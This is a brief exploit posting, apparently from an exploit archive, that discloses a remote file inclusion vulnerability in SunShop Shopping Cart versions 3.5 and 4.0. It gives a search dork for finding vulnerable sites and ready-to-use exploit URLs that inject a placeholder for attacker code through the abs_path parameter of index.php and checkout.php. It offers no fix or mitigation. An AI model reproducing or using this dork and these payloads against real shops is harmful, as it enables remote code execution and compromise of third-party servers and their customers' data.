SunShop Shopping Cart versions 3.5 and 4.0 suffer from a remote file inclusion vulnerability.
07272df07d81f6395d02745c33c415a8100656fbcdea55eff2e63e73fbc5cb78
sunshop 4 (index.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts : SunShop v3.5/4.0
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:
Exploit: www.target.com/index.php?abs_path=[evilcode]
www.target.com/checkout.php?abs_path=[evilcode]